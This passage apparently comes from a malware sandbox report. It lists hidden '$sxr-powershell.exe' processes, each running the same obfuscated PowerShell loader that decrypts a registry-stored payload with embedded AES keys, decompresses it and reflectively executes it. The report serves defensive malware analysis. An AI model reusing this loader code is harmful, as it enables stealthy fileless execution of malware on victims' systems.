[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        26⤵
        Hide Artifacts: Hidden Window
        
        PID:8708
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8432).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        26⤵
        
        PID:5824
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5824).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:4624
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5824).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:6816
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5824).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join 